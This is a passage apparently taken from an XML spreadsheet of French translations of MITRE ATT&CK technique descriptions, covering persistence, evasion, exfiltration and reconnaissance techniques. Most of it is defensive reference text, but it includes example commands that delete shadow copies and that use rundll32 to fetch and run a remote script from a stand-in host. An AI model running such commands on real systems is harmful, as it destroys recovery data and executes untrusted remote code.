    <t>Les adversaires peuvent attacher des filtres à une prise réseau pour surveiller, puis activer des portes dérobées utilisées pour la persistance ou la commande et le contrôle. Avec des autorisations élevées, les adversaires peuvent utiliser des fonctionnalités telles que la bibliothèque « libpcap » pour ouvrir des sockets et installer des filtres afin d’autoriser ou d’interdire à certains types de données de passer par le socket. Le filtre peut s’appliquer à tout le trafic passant par l’interface réseau spécifiée (ou à toutes les interfaces si non spécifiées). Lorsque l’interface réseau reçoit un paquet correspondant aux critères de filtrage, des actions supplémentaires peuvent être déclenchées sur l’hôte, telles que l’activation d’un shell inverse.
Pour établir une connexion, un adversaire envoie un paquet contrefait à l’hôte ciblé qui correspond aux critères de filtre installés. (Citation : haking9 libpcap reniflage du réseau) Des adversaires ont utilisé ces filtres de socket pour déclencher l’installation d’implants, effectuer des retours ping et invoquer des shells de commande. La communication avec ces filtres de socket peut également être utilisée conjointement avec le [Protocol Tunneling](https://attack.mitre.org/techniques/T1572). (Citation : filtres exatrack bpf portes dérobées passives)(Citation : Leonardo Turla Penquin, mai 2020)
Les filtres peuvent être installés sur n’importe quelle plate-forme de type Unix avec 'libpcap' installé ou sur des hôtes Windows utilisant 'Winpcap'.  Les adversaires peuvent utiliser soit 'libpcap' avec 'pcap_setfilter', soit la fonction de bibliothèque standard 'setsockopt' avec les options 'SO_ATTACH_FILTER. Étant donné que la connexion de socket n’est pas active tant que le paquet n’est pas reçu, ce comportement peut être difficile à détecter en raison de l’absence d’activité sur un hôte, d’une faible surcharge de processeur et d’une visibilité limitée sur l’utilisation brute du socket.
https://attack.mitre.org/techniques/T1205/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des utilitaires pour compresser et/ou chiffrer les données collectées avant l’exfiltration. De nombreux utilitaires incluent des fonctionnalités permettant de compresser, de chiffrer ou d’empaqueter les données dans un format plus facile et plus sûr à transporter.
Les adversaires peuvent abuser de divers utilitaires pour compresser ou crypter les données avant de les exfiltrer. Certains utilitaires tiers peuvent être préinstallés, tels que &lt;code&gt;tar&lt;/code&gt; sur Linux et macOS ou &lt;code&gt;zip&lt;/code&gt; sur les systèmes Windows. 
Sous Windows, &lt;code&gt;diantz&lt;/code&gt; ou &lt;code&gt; makecab&lt;/code&gt; peuvent être utilisés pour empaqueter les fichiers collectés dans un fichier armoire (.cab). &lt;code&gt;diantz&lt;/code&gt; peut également être utilisé pour télécharger et compresser des fichiers à partir d’emplacements distants (c’est-à-dire [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)). (Référence : diantz.exe_lolbas) &lt;code&gt;xcopy&lt;/code&gt; sous Windows peut copier des fichiers et des répertoires avec une variété d’options. De plus, les adversaires peuvent utiliser [certutil](https://attack.mitre.org/software/S0160) pour encoder en Base64 les données collectées avant l’exfiltration. 
Les adversaires peuvent également utiliser des utilitaires tiers, tels que 7-Zip, WinRAR et WinZip, pour effectuer des activités similaires. (Citation : page d’accueil 7zip)(Citation : Page d’accueil de WinRAR)(Citation : Page d’accueil de WinZip)
https://attack.mitre.org/techniques/T1560/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser [Comptes valides](https://attack.mitre.org/techniques/T1078) pour contrôler à distance des machines à l’aide de l’informatique de réseau virtuel (VNC).  VNC est un système de partage de bureau indépendant de la plate-forme qui utilise le protocole RFB (« remote framebuffer ») pour permettre aux utilisateurs de contrôler à distance l’affichage d’un autre ordinateur en relayant les entrées d’écran, de souris et de clavier sur le réseau. (Citation : Le protocole Framebuffer à distance)
VNC diffère du [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) car VNC est un logiciel de partage d’écran plutôt qu’un logiciel de partage de ressources. Par défaut, VNC utilise l’authentification du système, mais il peut être configuré pour utiliser des informations d’identification spécifiques à VNC. (Citation : Logiciel MacOS VNC pour le bureau à distance)(Citation : Authentification VNC)
Les adversaires peuvent abuser de VNC pour effectuer des actions malveillantes en tant qu’utilisateur connecté, telles que l’ouverture de documents, le téléchargement de fichiers et l’exécution de commandes arbitraires. Un adversaire pourrait utiliser VNC pour contrôler et surveiller à distance un système afin de collecter des données et des informations afin de pivoter vers d’autres systèmes au sein du réseau. Des bibliothèques/implémentations VNC spécifiques ont également été sensibles aux attaques par force brute et à l’exploitation de l’utilisation de la mémoire. (Citation : Détournement de VNC)(Citation : Connexion racine macOS VNC sans authentification)(Citation : Vulnérabilités VNC)(Citation : Vérification de l’authentification VNC de sécurité offensive)(Citation : Attaque des serveurs VNC PentestLab)(Citation : Bug d’authentification de La Havane)
https://attack.mitre.org/techniques/T1021/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de Windows Management Instrumentation (WMI) pour exécuter des commandes et des charges utiles malveillantes. WMI est conçu pour les programmeurs et constitue l’infrastructure pour la gestion, les données et les opérations sur les systèmes Windows. (Référence : WMI 1-3) WMI est une fonctionnalité d’administration qui fournit un environnement uniforme pour accéder aux composants du système Windows.
Le service WMI permet un accès local et distant, bien que ce dernier soit facilité par les [Services à distance](https://attack.mitre.org/techniques/T1021) tels que [Modèle objet de composant distribué](https://attack.mitre.org/techniques/T1021/003) et [Gestion à distance Windows](https://attack.mitre.org/techniques/T1021/006). (Référence : WMI 1-3) WMI distant sur DCOM fonctionne à l’aide du port 135, tandis que WMI sur WinRM fonctionne sur le port 5985 lors de l’utilisation de HTTP et 5986 pour HTTPS. (Référence : WMI 1-3) (Citation : Mandiant WMI)
Un adversaire peut utiliser WMI pour interagir avec des systèmes locaux et distants et l’utiliser comme moyen d’exécuter divers comportements, tels que la collecte d’informations pour [Discovery](https://attack.mitre.org/tactics/TA0007) ainsi que [Execution](https://attack.mitre.org/tactics/TA0002) de commandes et de charges utiles. (Citation : Mandiant WMI) Par exemple, un adversaire peut abuser de 'wmic.exe' pour supprimer des clichés instantanés avec la commande 'wmic.exe Shadowcopy Delete' (c’est-à-dire, [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)). (Référence : WMI 6)
**Remarque :** 'wmic.exe' est obsolète à partir de janvier 2024, la fonctionnalité WMIC étant « désactivée par défaut » sur Windows 11+. WMIC sera supprimé des versions ultérieures de Windows et remplacé par [PowerShell](https://attack.mitre.org/techniques/T1059/001) en tant qu’interface WMI principale. (Référence : WMI 7,8) En plus de PowerShell et d’outils tels que 'wbemtool.exe', les API COM peuvent également être utilisées pour interagir de manière programmatique avec WMI via C++, .NET, VBScript, etc.
https://attack.mitre.org/techniques/T1047</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de faire des captures d’écran du bureau pour recueillir des informations au cours d’une opération. La fonctionnalité de capture d’écran peut être incluse dans un outil d’accès à distance utilisé dans les opérations post-compromission. Il est également généralement possible de faire une capture d’écran à l’aide d’utilitaires natifs ou d’appels d’API, tels que &lt;code&gt;CopyFromScreen&lt;/code&gt;, &lt;code&gt;xwd&lt;/code&gt; ou &lt;code&gt;capture d’écran&lt;/code&gt;. (Citation : CopyFromScreen .NET)(Citation : Logiciel malveillant Mac obsolète)
https://attack.mitre.org/techniques/T1113</t>
  </si>
  <si>
    <t>Les adversaires peuvent stocker des données dans des formats « sans fichier » pour dissimuler les activités malveillantes aux défenses. Le stockage sans fichier peut être défini de manière générale comme tout format autre qu’un fichier. Parmi les exemples courants de stockage sans fichier non volatile dans les systèmes Windows, citons le registre Windows, les journaux d’événements ou le référentiel WMI. (Citation : Microsoft Fileless)(Citation : SecureList sans fichier) Dans les systèmes Linux, les répertoires de mémoire partagée tels que '/dev/shm', '/run/shm', '/var/run' et '/var/lock' peuvent également être considérés comme du stockage sans fichier, car les fichiers écrits dans ces répertoires sont mappés directement à la RAM et ne sont pas stockés sur le disque. (Citation : Binaire élastique exécuté à partir d’un répertoire de mémoire partagée)(Citation : Akami Frog4Shell 2024)(Citation : Aquasec Muhstik Malware 2024)
À l’instar des comportements en mémoire sans fichier tels que [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) et [Process Injection](https://attack.mitre.org/techniques/T1055), le stockage de données sans fichier peut ne pas être détecté par l’antivirus et d’autres outils de sécurité des terminaux qui ne peuvent accéder qu’à des formats de fichiers spécifiques à partir du stockage sur disque. L’exploitation du stockage sans fichier peut également permettre aux adversaires de contourner les protections offertes par les systèmes de fichiers en lecture seule sous Linux. (Citation : Sysdig Fileless Malware 23022)
Les adversaires peuvent utiliser le stockage sans fichier pour dissimuler divers types de données stockées, y compris les charges utiles/le shellcode (potentiellement utilisés dans le cadre de [Persistance](https://attack.mitre.org/tactics/TA0003)) et les données collectées qui n’ont pas encore été exfiltrées de la victime (par exemple, [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). De plus, il est fréquent que les adversaires chiffrent, encodent, épissent ou obscurcissent ces données sans fichier lorsqu’elles sont stockées.
Certaines formes d’activité de stockage sans fichier peuvent créer indirectement des artefacts dans le système de fichiers, mais dans des formats centraux et difficiles à inspecter tels que les fichiers physiques WMI (par exemple, ' %SystemRoot %\System32\Wbem\Repository') ou Registre (par exemple, ' %SystemRoot %\System32\Config'). (Citation : Microsoft Fileless)
https://attack.mitre.org/techniques/T1027/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des scripts exécutés automatiquement lors de l’initialisation du démarrage ou de l’ouverture de session pour établir la persistance. (Citation : Mandiant APT29 Eye Spy Email 22 novembre)(Citation : Anomali Rocke, mars 2019) Les scripts d’initialisation peuvent être utilisés pour exécuter des fonctions administratives, qui peuvent souvent exécuter d’autres programmes ou envoyer des informations à un serveur de journalisation interne. Ces scripts peuvent varier en fonction du système d’exploitation et s’ils sont appliqués localement ou à distance.  
Les adversaires peuvent utiliser ces scripts pour maintenir la persistance sur un seul système. Selon la configuration d’accès des scripts d’ouverture de session, des informations d’identification locales ou un compte administrateur peuvent être nécessaires. 
Un adversaire peut également être en mesure d’élever ses privilèges, car certains scripts d’initialisation de démarrage ou d’ouverture de session s’exécutent avec des privilèges plus élevés.
https://attack.mitre.org/techniques/T1037</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de se positionner entre deux ou plusieurs appareils en réseau à l’aide d’une technique AiTM (Adversary-in-the-Middle) pour soutenir des comportements ultérieurs tels que [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) ou les attaques par rejeu ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). En abusant des fonctionnalités des protocoles réseau courants qui peuvent déterminer le flux du trafic réseau (par exemple, ARP, DNS, LLMNR, etc.), les adversaires peuvent forcer un appareil à communiquer par le biais d’un système contrôlé par l’adversaire afin de collecter des informations ou d’effectuer des actions supplémentaires. (Citation : Rapid7 MiTM Basics)
Par exemple, les adversaires peuvent manipuler les paramètres DNS de la victime pour permettre d’autres activités malveillantes, telles que l’empêchement/la redirection des utilisateurs pour qu’ils accèdent à des sites légitimes et/ou la diffusion de logiciels malveillants supplémentaires. (Référence : ttint_rat)(Référence : dns_changer_trojans)(Référence : ad_blocker_with_miner) Les adversaires peuvent également manipuler le DNS et exploiter leur position afin d’intercepter les informations d’identification des utilisateurs, y compris les jetons d’accès ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) et les cookies de session ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)). (Référence : volexity_0day_sophos_FW)(Citation : Tactiques symboliques) [Attaque de rétrogradation]Les (https://attack.mitre.org/techniques/T1562/010)s peuvent également être utilisés pour établir une position AiTM, par exemple en négociant une version moins sécurisée, obsolète ou plus faible du protocole de communication (SSL/TLS) ou de l’algorithme de chiffrement. (Référence : mitm_tls_downgrade_att)(Référence : taxonomy_downgrade_att_tls)(Référence : tlseminar_downgrade_att)
Les adversaires peuvent également tirer parti de la position AiTM pour tenter de surveiller et/ou de modifier le trafic, comme dans [Manipulation de données transmises](https://attack.mitre.org/techniques/T1565/002). Les adversaires peuvent configurer une position similaire à AiTM pour empêcher le trafic de circuler vers la destination appropriée, potentiellement vers [Entraver les défenses](https://attack.mitre.org/techniques/T1562) et/ou à l’appui d’un [Déni de service du réseau](https://attack.mitre.org/techniques/T1498).
https://attack.mitre.org/techniques/T1557</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’identifier l’utilisateur principal, l’utilisateur actuellement connecté, l’ensemble d’utilisateurs qui utilisent couramment un système ou si un utilisateur utilise activement le système. Ils peuvent le faire, par exemple, en récupérant les noms d’utilisateur des comptes ou en utilisant [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Les informations peuvent être collectées de différentes manières à l’aide d’autres techniques de découverte, car les détails de l’utilisateur et du nom d’utilisateur sont répandus dans l’ensemble d’un système et incluent la propriété du processus en cours d’exécution, la propriété des fichiers/répertoires, les informations de session et les journaux système. Les adversaires peuvent utiliser les informations de [Découverte du propriétaire du système/de l’utilisateur](https://attack.mitre.org/techniques/T1033) lors de la découverte automatique pour façonner des comportements ultérieurs, notamment si l’adversaire infecte complètement la cible et/ou tente ou non des actions spécifiques.
Divers utilitaires et commandes peuvent acquérir ces informations, y compris &lt;code&gt;whoami&lt;/code&gt;. Sous macOS et Linux, l’utilisateur actuellement connecté peut être identifié par &lt;code&gt;w&lt;/code&gt; et &lt;code&gt;who&lt;/code&gt;. Sur macOS, la commande &lt;code&gt;dscl . list /Users | grep -v '_'&lt;/code&gt; peut également être utilisée pour énumérer les comptes d’utilisateurs. Les variables &lt;code&gt;d’environnement, telles que %USERNAME %&lt;/code&gt; et &lt;code&gt;$USER&lt;/code&gt;, peuvent également être utilisées pour accéder à ces informations.
Sur les périphériques réseau, les commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'show users' et 'show ssh' peuvent être utilisées pour afficher les utilisateurs actuellement connectés au périphérique. (Référence : show_ssh_users_cmd_cisco)(Référence : US-CERT TA18-106A Network Infrastructure Devices 2018)
https://attack.mitre.org/techniques/T1033</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter, louer, louer ou obtenir une infrastructure qui peut être utilisée pendant le ciblage. Il existe une grande variété d’infrastructures pour héberger et orchestrer les opérations de l’adversaire. Les solutions d’infrastructure comprennent des serveurs physiques ou cloud, des domaines et des services Web tiers. (Citation : TrendmicroHideoutsLease) Certains fournisseurs d’infrastructure offrent des périodes d’essai gratuites, ce qui permet d’acquérir des infrastructures à un coût limité ou gratuit. (Citation : Essai gratuit PurpleUrchin) De plus, les botnets sont disponibles à la location ou à l’achat.
L’utilisation de ces solutions d’infrastructure permet aux adversaires de mettre en scène, de lancer et d’exécuter des opérations. Les solutions peuvent aider les opérations de l’adversaire à se fondre dans le trafic considéré comme normal, par exemple en contactant des services Web tiers ou en acquérant une infrastructure pour prendre en charge [Proxy](https://attack.mitre.org/techniques/T1090), y compris à partir de services proxy résidentiels. (Référence : amnesty_nso_pegasus)(Citation : Bourrage d’identifiants par procuration par le FBI)(Référence : Mandiant APT29 Microsoft 365 2022) En fonction de la mise en œuvre, les adversaires peuvent utiliser une infrastructure qui rend difficile la connexion physique à eux, ainsi qu’une infrastructure qui peut être rapidement provisionnée, modifiée et arrêtée.
https://attack.mitre.org/techniques/T1583</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution de code malveillant rundll32.exe à proxy . L’utilisation de rundll32.exe, au lieu de l’exécution directe (c’est-à-dire [Modules partagés](https://attack.mitre.org/techniques/T1129)), peut éviter de déclencher des outils de sécurité qui peuvent ne pas surveiller l’exécution du processus rundll32.exe en raison de listes d’autorisation ou de faux positifs provenant d’opérations normales. Rundll32.exe est généralement associé à l’exécution de charges utiles DLL (ex : &lt;code&gt;rundll32.exe {DLLname, DLLfunction}&lt;/code&gt;).
Rundll32.exe peut également être utilisé pour exécuter des fichiers d’éléments (.cpl) [Panneau de configuration](https://attack.mitre.org/techniques/T1218/002) via les fonctions shell32.dll non documentées &lt;code&gt;Control_RunDLL&lt;/code&gt; et &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-cliquer sur un fichier .cpl entraîne également l’exécution de rundll32.exe. (Citation : Trend Micro CPL) Par exemple, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) peut être envoyé par proxy via Rundll32.exe.
Rundll32 peut également être utilisé pour exécuter des scripts tels que JavaScript. Cela peut être fait en utilisant une syntaxe similaire à celle-ci : &lt;code&gt;rundll32.exe javascript :"\.. \mshtml,RunHTMLApplication " ; document.write() ; GetObject("script :https[ :]//www[.]exemple[.]com/malicious.sct ») »&lt;/code&gt; Ce comportement a été observé utilisé par des logiciels malveillants tels que Poweliks. (Citation : Il s’agit d’une confusion de ligne de commande de sécurité)
Les adversaires peuvent également tenter de masquer le code malveillant de l’analyse en abusant de la manière dont rundll32.exe charge les noms de fonction DLL. Dans le cadre de la prise en charge de la compatibilité Windows pour divers jeux de caractères, rundll32.exe vérifierons d’abord les fonctions larges/Unicode puis les fonctions prises en charge par les caractères ANSI avant de charger la fonction spécifiée (par exemple, étant donné la commande &lt;code&gt;rundll32.exe ExampleDLL.dll, ExampleFunction,&lt;/code&gt; rundll32.exe tenteriez d’abord d’exécuter &lt;code&gt;ExampleFunctionW&lt;/code&gt;, ou à défaut de cette &lt;code&gt;ExampleFunctionA&lt;/code&gt;, avant de charger &lt;code&gt;ExampleFunction&lt;/code&gt;). Les adversaires peuvent donc masquer le code malveillant en créant plusieurs noms de fonctions exportés identiques et en ajoutant &lt;code&gt;W&lt;/code&gt; et/ou &lt;code&gt;A&lt;/code&gt; à des noms inoffensifs. (Citation : Attaquer Rundll32.exe obscurité)(Citation : github noRunDll) Les fonctions DLL peuvent également être exportées et exécutées par un numéro ordinal (ex : &lt;code&gt;rundll32.exe file.dll,#1&lt;/code&gt;).
De plus, les adversaires peuvent utiliser des techniques de masquage(https://attack.mitre.org/techniques/T1036) (telles que la modification des noms de fichiers DLL, des extensions de fichiers ou des noms de fonctions) pour dissimuler davantage l’exécution d’une charge utile malveillante. (Citation : rundll32.exe évasion de la défense)
https://attack.mitre.org/techniques/T1218/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de découvrir des conteneurs et d’autres ressources disponibles dans un environnement de conteneurs. D’autres ressources peuvent inclure des images, des déploiements, des pods, des nœuds et d’autres informations telles que l’état d’un cluster.
Ces ressources peuvent être consultées dans des applications web telles que le tableau de bord Kubernetes ou peuvent être interrogées via les API Docker et Kubernetes. (Citation : API Docker)(Citation : API Kubernetes) Dans Docker, les journaux peuvent divulguer des informations sur l’environnement, telles que la configuration de l’environnement, les services disponibles et le fournisseur de cloud que la victime peut utiliser. La découverte de ces ressources peut éclairer les prochaines étapes d’un adversaire dans l’environnement, telles que la façon d’effectuer un mouvement latéral et les méthodes d’exécution à utiliser.
https://attack.mitre.org/techniques/T1613</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter et configurer une infrastructure cloud sans serveur, telle que Cloudflare Workers, des fonctions AWS Lambda ou des scripts Google Apps, qui peuvent être utilisées lors du ciblage. En utilisant une infrastructure sans serveur, les adversaires peuvent rendre plus difficile l’attribution de l’infrastructure utilisée pendant les opérations.
Une fois acquis, l’environnement d’exécution sans serveur peut être exploité pour répondre directement aux machines infectées ou au trafic [Proxy](https://attack.mitre.org/techniques/T1090) vers un serveur de commande et de contrôle appartenant à l’adversaire. (Citation : BlackWater Malware Cloudflare Workers)(Référence : redirecteur AWS Lambda)(Citation : GWS Apps Script Abuse 2021) Étant donné que le trafic généré par ces fonctions semblera provenir de sous-domaines de fournisseurs de cloud courants, il peut être difficile de distinguer le trafic ordinaire destiné à ces fournisseurs, ce qui facilite l’utilisation de [Masquer l’infrastructure](https://attack.mitre.org/techniques/T1665). (Citation : Détection de la commande et du contrôle dans le cloud)(Citation : BlackWater Malware Cloudflare Workers)
https://attack.mitre.org/techniques/T1583/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent coder les données à l’aide d’un système de codage de données standard pour rendre le contenu du trafic de commande et de contrôle plus difficile à détecter. Les informations de commande et de contrôle (C2) peuvent être codées à l’aide d’un système de codage de données standard qui adhère aux spécifications de protocole existantes. Les schémas de codage de données courants incluent ASCII, Unicode, hexadécimal, Base64 et MIME. (Citation : Wikipédia Binary-to-text Encoding)(citation : Codage des caractères de Wikipédia) Certains systèmes d’encodage de données peuvent également entraîner une compression de données, tels que gzip.
https://attack.mitre.org/techniques/T1132/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent intégrer des charges utiles dans d’autres fichiers pour dissimuler le contenu malveillant aux défenses. Sinon, des fichiers apparemment inoffensifs (tels que des scripts et des exécutables) peuvent être utilisés à mauvais escient pour transporter et obscurcir des charges utiles et du contenu malveillants. Dans certains cas, les charges utiles intégrées peuvent également permettre aux adversaires de [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) sans affecter les contrôles d’exécution tels que les signatures numériques et les tickets de notarisation. (Citation : Laboratoires Sentinelle) 
Les adversaires peuvent intégrer des charges utiles dans différents formats de fichier pour masquer les charges utiles. (Citation : Microsoft Learn) Ceci est similaire à la [Steganographie](https://attack.mitre.org/techniques/T1027/003), mais n’implique pas de tisser du contenu malveillant en octets et motifs spécifiques liés à des formats de médias numériques légitimes. (Citation : GitHub PSImage) 
Par exemple, des adversaires ont été observés en train d’intégrer des charges utiles dans un binaire autrement bénin ou en tant que superposition de celui-ci. (Citation : securelist dtrack2) Des adversaires ont également été observés en train d’imbriquer des charges utiles (telles que des exécutables et des scripts d’exécution seule) dans un fichier du même format. (Citation : SentinelLabs inversant les applescripts en run-only 2021) 
Le contenu intégré peut également être utilisé comme charges utiles [Injection de processus](https://attack.mitre.org/techniques/T1055) utilisées pour infecter des processus système inoffensifs. (Citation : Trend Micro) Ces charges utiles intégrées puis injectées peuvent être utilisées dans le cadre de modules de logiciels malveillants conçus pour fournir des fonctionnalités spécifiques telles que le chiffrement des communications C2 à l’appui d’un module d’orchestration. Par exemple, un module embarqué peut être injecté dans les navigateurs par défaut, permettant aux adversaires de communiquer ensuite via le réseau. (Citation : Rapport d’analyse des logiciels malveillants ComRAT)
https://attack.mitre.org/techniques/T1027/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les modules d’authentification enfichables (PAM) pour accéder aux informations d’identification de l’utilisateur ou permettre un accès injustifié aux comptes. PAM est un système modulaire de fichiers de configuration, de bibliothèques et de fichiers exécutables qui guident l’authentification pour de nombreux services. Le module d’authentification le plus courant est &lt;code&gt;pam_unix.so&lt;/code&gt;, qui récupère, définit et vérifie les informations d’authentification de compte dans &lt;code&gt;/etc/passwd&lt;/code&gt; et &lt;code&gt;/etc/shadow&lt;/code&gt;. (Citation : Apple PAM)(Citation : Man Pam_Unix)(Citation : Red Hat PAM)
Les adversaires peuvent modifier des composants du système PAM pour créer des portes dérobées. Les composants PAM, tels que &lt;code&gt;pam_unix.so&lt;/code&gt;, peuvent être corrigés pour accepter des valeurs arbitraires fournies par l’adversaire comme informations d’identification légitimes. (Citation : PAM Backdoor)
Les modifications malveillantes apportées au système PAM peuvent également être utilisées de manière abusive pour voler des informations d’identification. Les adversaires peuvent infecter les ressources PAM avec du code pour collecter les informations d’identification de l’utilisateur, car les valeurs échangées avec les composants PAM peuvent être en texte brut puisque PAM ne stocke pas les mots de passe. (Citation : PAM Creds)(Citation : Apple PAM)
https://attack.mitre.org/techniques/T1556/003</t>
  </si>
  <si>
    <t>Un adversaire peut annuler les modifications apportées à une instance cloud après avoir effectué des activités malveillantes dans le but d’échapper à la détection et de supprimer les preuves de sa présence. Dans les environnements hautement virtualisés, tels que les infrastructures basées sur le cloud, cela peut être accompli en restaurant des instantanés de machine virtuelle (VM) ou de stockage de données via le tableau de bord de gestion du cloud ou des API cloud.
Une autre variante de cette technique consiste à utiliser un stockage temporaire attaché à l’instance de calcul. La plupart des fournisseurs de cloud proposent différents types de stockage, notamment persistant, local et/ou éphémère, les types éphémères étant souvent réinitialisés lors de l’arrêt/redémarrage de la machine virtuelle. (Citation : Tech Republic - Restaurer les instantanés AWS)(Citation : Google - Restaurer l’instantané du cloud)
https://attack.mitre.org/techniques/T1578/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les hôtes de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les hôtes peuvent inclure une variété de détails, y compris des données administratives (par exemple, nom, adresse IP attribuée, fonctionnalité, etc.) ainsi que des détails concernant sa configuration (par exemple : système d’exploitation, langue, etc.).
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’une [analyse active](https://attack.mitre.org/techniques/T1595) ou d’un [hameçonnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598). Les adversaires peuvent également compromettre les sites et inclure du contenu malveillant conçu pour collecter des informations sur l’hôte auprès des visiteurs. (Citation : ATT ScanBox) Les informations sur les hôtes peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Médias sociaux](https://attack.mitre.org/techniques/T1593/001) ou [Sites Web appartenant à des victimes de recherche](https://attack.mitre.org/techniques/T1594)). La collecte de ces informations peut révéler des possibilités pour d’autres formes de reconnaissance (ex : [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Recherche de bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)), d’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou d’accès initial (ex : [Chaîne d’approvisionnement compromis](https://attack.mitre.org/techniques/T1195) ou [services à distance externes](https://attack.mitre.org/techniques/T1133)).
Les adversaires peuvent également collecter des informations sur l’hôte de la victime via des en-têtes HTTP User-Agent, qui sont envoyés à un serveur pour identifier l’application, le système d’exploitation, le fournisseur et/ou la version de l’agent utilisateur demandeur. Cela peut être utilisé pour éclairer l’action de suivi de l’adversaire. Par exemple, les adversaires peuvent vérifier les agents utilisateurs pour le système d’exploitation demandeur, puis ne diffuser des logiciels malveillants que pour les systèmes d’exploitation cibles tout en ignorant les autres. (Citation : TrellixQakbot)
https://attack.mitre.org/techniques/T1592</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des données de certificat numérique publiques pour obtenir des informations sur les victimes qui peuvent être utilisées lors du ciblage. Les certificats numériques sont émis par une autorité de certification (CA) afin de vérifier cryptographiquement l’origine du contenu signé. Ces certificats, tels que ceux utilisés pour le trafic Web chiffré (communications HTTPS SSL/TLS), contiennent des informations sur l’organisation enregistrée, telles que le nom et l’emplacement.
Les adversaires peuvent rechercher des données de certificat numérique pour recueillir des informations exploitables. Les auteurs de menace peuvent utiliser des ressources en ligne et des outils de recherche pour recueillir des informations sur les certificats. (Citation : SSLShopper Lookup) Les données de certificat numérique peuvent également être disponibles à partir d’artefacts signés par l’organisation (par exemple, les certificats utilisés à partir du trafic Web chiffré sont servis avec du contenu). (Citation : Certificat SSL moyen) Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Analyse active](https://attack.mitre.org/techniques/T1595) ou [Phishing pour obtenir de l’information](https://attack.mitre.org/techniques/T1598)), l’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou un accès initial (ex : [Externe distant Services](https://attack.mitre.org/techniques/T1133) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1596/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent enregistrer les frappes au clavier de l’utilisateur pour intercepter les informations d’identification au fur et à mesure que l’utilisateur les saisit. L’enregistrement de frappe est susceptible d’être utilisé pour acquérir des informations d’identification pour de nouvelles opportunités d’accès lorsque les efforts de [déchargement des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003) ne sont pas efficaces et peuvent nécessiter qu’un adversaire intercepte les frappes au clavier sur un système pendant une période de temps importante avant que les informations d’identification ne puissent être capturées avec succès. Afin d’augmenter la probabilité de capturer rapidement les informations d’identification, un adversaire peut également effectuer des actions telles que l’effacement des cookies du navigateur pour forcer les utilisateurs à se réauthentifier auprès des systèmes. (Référence : Talos Kimsuky, novembre 2021)
L’enregistrement de frappe est le type de capture d’entrée le plus répandu, avec de nombreuses façons différentes d’intercepter les frappes au clavier. (Citation : Aventures d’une frappe) Certaines méthodes incluent :
* Callbacks de l’API de raccordement utilisés pour le traitement des frappes au clavier. Contrairement à [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), il se concentre uniquement sur les fonctions API destinées au traitement des données de frappe.
* Lecture des données brutes de frappe à partir de la mémoire tampon matérielle.
* Modifications du registre Windows.
* Pilotes personnalisés.
* [Modifier l’image système](https://attack.mitre.org/techniques/T1601) peut fournir aux adversaires des crochets dans le système d’exploitation des périphériques réseau pour lire les frappes brutes des sessions de connexion. (Citation : Blog Cisco Legacy Device Attacks)
https://attack.mitre.org/techniques/T1056/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de masquer leurs artefacts basés sur des fichiers en les écrivant dans des dossiers spécifiques ou des noms de fichiers exclus de l’analyse antivirus (AV) et d’autres fonctionnalités défensives. Les scanners antivirus et autres analyseurs basés sur des fichiers incluent souvent des exclusions pour optimiser les performances et faciliter l’installation et l’utilisation légitime des applications. Ces exclusions peuvent être contextuelles (par exemple, les analyses ne sont lancées qu’en réponse à des événements/alertes déclencheurs spécifiques), mais sont aussi souvent des chaînes codées en dur faisant référence à des dossiers et/ou des fichiers spécifiques supposés fiables et légitimes. (Citation : Exclusions de dossiers de fichiers Microsoft)
